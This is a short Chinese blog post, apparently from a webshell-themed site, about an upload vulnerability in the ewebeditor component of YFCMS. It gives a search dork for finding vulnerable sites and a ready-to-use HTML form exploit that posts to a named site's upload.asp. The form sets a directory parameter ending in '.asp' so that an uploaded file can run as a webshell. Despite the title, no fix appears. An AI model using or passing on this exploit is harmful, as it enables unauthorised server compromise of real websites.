YFCMS之ewebeditor上传漏洞及修复

分类:安全 | 2011-08-21 | 撸过 88 次
1人扯谈

google关键字:intext:版权所有:yfcms

利用文件:admin\WebEditor\asp\upload.asp

利用代码:
<form action="http://www.badguest.cn/admin/WebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=st999.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

这里有个前提 ,要知道网站的后台目录才行。

本站内容均为原创,转载请务必保留署名与链接!
YFCMS之ewebeditor上传漏洞及修复:https://www.webshell.cc/746.html
标签:

相关日志